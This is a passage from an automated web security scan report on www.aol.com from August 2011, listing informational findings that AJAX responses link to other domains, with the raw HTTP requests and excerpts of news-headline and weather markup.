<a class="local_links_normal lnid-sec2_lnk7 tooltips" name="om_local_7" href="http://www.nbcdfw.com/news/local/Threats-Against-Priests-Prompt-Warning-From-Ft-Worth-Diocese-128024113.html" target='_blank' >Threats Against Priests Prompt Warning</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk8 tooltips" name="om_local_8" href="http://www.nbcdfw.com/news/local/Restaurant-Customers-Rally-for-Former-Waitress-128025963.html" target='_blank' >Restaurant Customers Rally for Former...</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather1" class="lnid-sec4_lnk1">
<img alt="Mostly Clear"
title="Mostly Clear"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather2" class="lnid-sec4_lnk2">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather3" class="lnid-sec4_lnk3">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather4" class="lnid-sec4_lnk4">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
</a>

| <a href="http://mapq.st/?q=75201&maptype=map&layer=traffic" name="om_localtraffic1" class="lnid-sec5_lnk5">Live Traffic Updates</a>
...[SNIP]...
<div id="localPatchStory">

<a id="localPatchLogo" title="Your local source for news, events, business listings, and discussion." name="om_patchicon" target="_blank" href="http://www.patch.com/"></a><h3 id="patchHeader"><a name="om_patchheader" target="_blank" href="http://www.patch.com/">Today's Neighborhood Pick</a>
...[SNIP]...
<p><a id="patchLoc" name="om_patchlocation" href="http://bed-stuy.patch.com/">Bedford-Stuyvesant, NY:</a> &nbsp;<a name="om_patchstory" target="_blank" href="http://bed-stuy.patch.com/articles/cast-iron-gates-and-chicken-wire-surround-her-house-to-avoid-eviction">Elderly Woman Resorts to Iron Gates, Chicken Wire to Stave Off Eviction</a>
...[SNIP]...

6.15. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=15&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl15

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-95.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2475
Set-Cookie: JSESSIONID=93BB77764F8FBAE0E5369C9BAB541BCB; Path=/aol
Content-Length: 2475

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl15 plid-87510 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl15_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl15|sec1_lnk1|87510" href="http://www.huffingtonpost.com/2011/08/18/child-well-being-rankings_n_929724.html"><img height="217" alt="Minneapolis" width="386" src="http://i.huffpost.com/gen/332356/thumbs/a-MINNESOTA-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl15_hdln" href="http://www.huffingtonpost.com/2011/08/18/child-well-being-rankings_n_929724.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl15|sec1_lnk2|87510">The Best (& Worst) States for Children</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl15_cpy" href="http://www.huffingtonpost.com/2011/08/18/child-well-being-rankings_n_929724.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl15|sec1_lnk3|87510">Southern state that was ranked last</a>
...[SNIP]...
<li ><a name="om_dl15_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl15|sec3_lnk1|87510" href="http://www.huffingtonpost.com/katherine-bindley/interviewing-should-you-take-the-ring-off_b_930242.html">Reason Women Don't Get Raises?</a>
...[SNIP]...
<li ><a name="om_dl15_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl15|sec3_lnk2|87510" href="http://www.huffingtonpost.com/2011/08/18/macys-giambattista-valli-collaboration-_n_930123.html">Macy's Names Its Next Designer</a>
...[SNIP]...
<li ><a name="om_dl15_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl15|sec3_lnk3|87510" href="http://www.huffingtonpost.com/carleton-kendrick/are-you-embarrassed-by-yo_b_929119.html">Embarrassed by Your Kids' Looks?</a>
...[SNIP]...

6.16. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=18&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl18

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-70.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2572
Set-Cookie: JSESSIONID=0B171AAA7FE5F942446C3D16AD9463A0; Path=/aol
Content-Length: 2572

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl18 plid-87445 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl18_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl18|sec1_lnk1|87445" href="http://www.huffingtonpost.com/2011/08/17/kim-kardashian-wedding-guest-list_n_929908.html#s332559&amp;title=Lala_Vasquez_"><img height="217" alt="Kris and Kim Kissing" width="386" src="http://i.huffpost.com/gen/332235/thumbs/a-KIM-AND-KRIS-KISS-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl18_hdln" href="http://www.huffingtonpost.com/2011/08/17/kim-kardashian-wedding-guest-list_n_929908.html#s332559&amp;title=Lala_Vasquez_" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl18|sec1_lnk2|87445">Star-Studded Guest List Revealed


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl18_cpy" href="http://www.huffingtonpost.com/2011/08/17/kim-kardashian-wedding-guest-list_n_929908.html#s332559&amp;title=Lala_Vasquez_" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl18|sec1_lnk3|87445">15 celebs who said 'I do' to the invite
</a>
...[SNIP]...
<li ><a name="om_dl18_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl18|sec3_lnk1|87445" href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html">Anderson Cooper Loses Composure
</a>
...[SNIP]...
<li ><a name="om_dl18_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl18|sec3_lnk2|87445" href="http://www.huffingtonpost.com/2011/07/29/analeigh-tiptons-star-rises_n_912944.html">New 'It' Girl Is 22-Year-Old Beauty
</a>
...[SNIP]...
<li ><a name="om_dl18_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl18|sec3_lnk3|87445" href="http://www.aoltv.com/2011/08/18/real-housewives-suicide/">Ex-'Housewife' Considered Suicide
</a>
...[SNIP]...

6.17. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=21&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl21

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:17:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-38.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2449
Set-Cookie: JSESSIONID=B5FF9B64B3C9B143D4789D34203998B9; Path=/aol
Content-Length: 2449

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl21 plid-87439 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl21_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl21|sec1_lnk1|87439" href="http://www.huffingtonpost.com/2011/08/17/viola-drath-death_n_929935.html"><img height="217" alt="Viola Drath" width="386" src="http://portal.aolcdn.com/p5/forms/620/aa914711-50a3-4a73-a165-5be005d1162a.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl21_hdln" href="http://www.huffingtonpost.com/2011/08/17/viola-drath-death_n_929935.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl21|sec1_lnk2|87439">Socialite's Bizarre Death a Mystery</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl21_cpy" href="http://www.huffingtonpost.com/2011/08/17/viola-drath-death_n_929935.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl21|sec1_lnk3|87439">His astonishing reaction to her death</a>
...[SNIP]...
<li ><a name="om_dl21_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl21|sec3_lnk1|87439" href="http://www.huffingtonpost.com/2011/08/18/f-word-pg-13-movies_n_930165.html">F-Word Down in PG-13 Movies</a>
...[SNIP]...
<li ><a name="om_dl21_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl21|sec3_lnk2|87439" href="http://www.foxnews.com/us/2011/08/17/new-video-surfaces-showing-unprovoked-attack-by-philadelphia-teens/">Video Shows Brutal Mob Attack</a>
...[SNIP]...
<li ><a name="om_dl21_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl21|sec3_lnk3|87439" href="http://www.foxnews.com/us/2011/08/17/tennessee-doctor-told-to-remove-american-flag-flying-at-office/">Woman Told to Remove American Flag</a>
...[SNIP]...

6.18. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=7&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-85.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2463
Set-Cookie: JSESSIONID=F2F3171F94E1B6C201CDAF053AB96366; Path=/aol
Content-Length: 2463

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl7 plid-87573 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl7_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl7|sec1_lnk1|87573" href="http://www.huffingtonpost.com/2011/08/18/michael-sanchez-reunited-_n_930293.html"><img height="217" alt="Michael Sanchez and Emily" width="386" src="http://i.huffpost.com/gen/332679/thumbs/a-MICHAEL-SANCHEZ-AND-DAUGHTER-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl7_hdln" href="http://www.huffingtonpost.com/2011/08/18/michael-sanchez-reunited-_n_930293.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl7|sec1_lnk2|87573">Dad and Daughter Reunite After 3 Years
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl7_cpy" href="http://www.huffingtonpost.com/2011/08/18/michael-sanchez-reunited-_n_930293.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl7|sec1_lnk3|87573">How he eventually tracked her down</a>
...[SNIP]...
<li ><a name="om_dl7_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl7|sec3_lnk2|87573" href="http://www.huffingtonpost.com/2011/08/18/james-desborough-arrested_n_930233.html">Hollywood Arrest in Hacking Scandal
</a>
...[SNIP]...
<li ><a name="om_dl7_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl7|sec3_lnk3|87573" href="http://www.huffingtonpost.com/2011/08/18/dandre-howard-triple-murd_n_930612.html">Triple-Murder Suspect Claims Self Defense
</a>
...[SNIP]...

6.19. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=local&t=cod HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html, */*; q=0.01
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/?r=404
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: rrpmo1=rr1~1~1313709994071~0; stips5=1; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313710009932-New%7C1376782009932%3B%20s_nrgvo%3DNew%7C1376782009933%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 23:26:36 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-92.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=E26F571FE499A1AE7150504D4050F172; Path=/aol
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 12159

<div id="local-module" class="gmod mnid-local plid-87491">
<div id="localheader">

<h2>Local News and Weather</h2>

<div id="localstories_location" class="localeditspace">
<div class="citySta
...[SNIP]...
<a href="" name="om_localclose" id="locationclose" class="lnid-sec1_lnk4 sprite"><img src="http://portal.aolcdn.com/p5/_v58.6/css/maing.png" alt="Cancel"></a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk1 tooltips" name="om_local_1" href="http://dfw.cbslocal.com/2011/08/18/report-finds-nearly-one-in-four-texas-children-living-in-poverty/" target='_blank' >Report Finds Nearly One in Four Texas...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk2 tooltips" name="om_local_2" href="http://www.nbcdfw.com/news/local/Hunt-Co-Brush-Fire-Burning-Several-Acres-128037173.html" target='_blank' >Brushfires Break Out in Johnson, Hunt...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk3 tooltips" name="om_local_3" href="http://www.nbcdfw.com/news/local/DISD-Still-Needs-285-Teachers-128035953.html" target='_blank' >DISD Still Needs 285 Teachers</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk4 tooltips" name="om_local_4" href="http://www.star-telegram.com/2011/08/18/3299583/local-catholic-churches-warned.html" target='_blank' >Local Catholic churches warned of threats...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk5 tooltips" name="om_local_5" href="http://dfw.cbslocal.com/2011/08/18/dow-jones-drops-400-points/" target='_blank' >Dow Jones Drops 400+ Points</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk6 tooltips" name="om_local_6" href="http://www.myfoxdfw.com/dpps/news/more-than-2,000-civilians-killed-in-syria-dpgonc-km-20110818_14625917" target='_blank' >More Than 2,000 Civilians Dead In Syria</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk7 tooltips" name="om_local_7" href="http://dfw.cbslocal.com/2011/08/18/good-samaritan-fights-current-to-save-drowning-boy/" target='_blank' >Good Samaritan Fights Current To Save...</a>
...[SNIP]...
</span>
<a class="local_links_normal lnid-sec2_lnk8 tooltips" name="om_local_8" href="http://www.cbssports.com/nfl/story/15450124/mcmahon-former-players-sue-nfl-over-concussions/rss" target='_blank' >McMahon, former players sue NFL over...</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather1" class="lnid-sec4_lnk1">
<img alt="Mostly Clear"
title="Mostly Clear"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather2" class="lnid-sec4_lnk2">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather3" class="lnid-sec4_lnk3">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327"
name="om_localweather4" class="lnid-sec4_lnk4">
<img alt="Partly Cloudy"
title="Partly Cloudy"
src="http://portal.aolcdn.com/p5/_v58.6/css/w/w30.png"
style="display:block;"/>

</a>
...[SNIP]...
</a>

| <a href="http://mapq.st/?q=75201&maptype=map&layer=traffic" name="om_localtraffic1" class="lnid-sec5_lnk5">Live Traffic Updates</a>
...[SNIP]...
<div id="localPatchStory">

<a id="localPatchLogo" title="Your local source for news, events, business listings, and discussion." name="om_patchicon" target="_blank" href="http://www.patch.com/"></a><h3 id="patchHeader"><a name="om_patchheader" target="_blank" href="http://www.patch.com/">Today's Neighborhood Pick</a>
...[SNIP]...
<p><a id="patchLoc" name="om_patchlocation" href="http://bed-stuy.patch.com/">Bedford-Stuyvesant, NY:</a> &nbsp;<a name="om_patchstory" target="_blank" href="http://bed-stuy.patch.com/articles/cast-iron-gates-and-chicken-wire-surround-her-house-to-avoid-eviction">Elderly Woman Resorts to Iron Gates, Chicken Wire to Stave Off Eviction</a>
...[SNIP]...

6.20. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2520
Set-Cookie: JSESSIONID=A3952DF32658E1DB2F8B42FB462C9CBB; Path=/aol
Content-Length: 2520

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-87592 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl3_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl3|sec1_lnk1|87592" href="http://energy.aol.com/2011/08/13/completely-off-the-grid/"><img height="217" alt="Mike Strizki's solar panels generate enough power for him to live off the grid year-round at his house in Hopewell, N.J." width="386" src="http://i.huffpost.com/gen/332739/thumbs/a-HYRDOGENHOUSE-386x217.jpg"/></a>
...[SNIP]...

6.21. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl9

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-51.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2000
Set-Cookie: JSESSIONID=7C1572C72EA5E38BAA9DD224BBEC41C5; Path=/aol
Content-Length: 2000

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl9 plid-87411 display-lightbox">
<div id="advert">

...[SNIP]...
</span><img height="217" alt="System Mechanic" width="386" src="http://i.huffpost.com/gen/332196/thumbs/a-SYSTEM-MECHANIC-386x217.jpg"/></a>
...[SNIP]...
<a id="dl-sponsorimg" href="http://lifestore.aol.com/main" class="icid-maing-grid7|main5|dl9|link4|87411"><img src="http://portal.aolcdn.com/p5/forms/673/85a240c0-468a-4d46-b2d8-5587dc87339c.gif"/></a>
...[SNIP]...

6.22. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
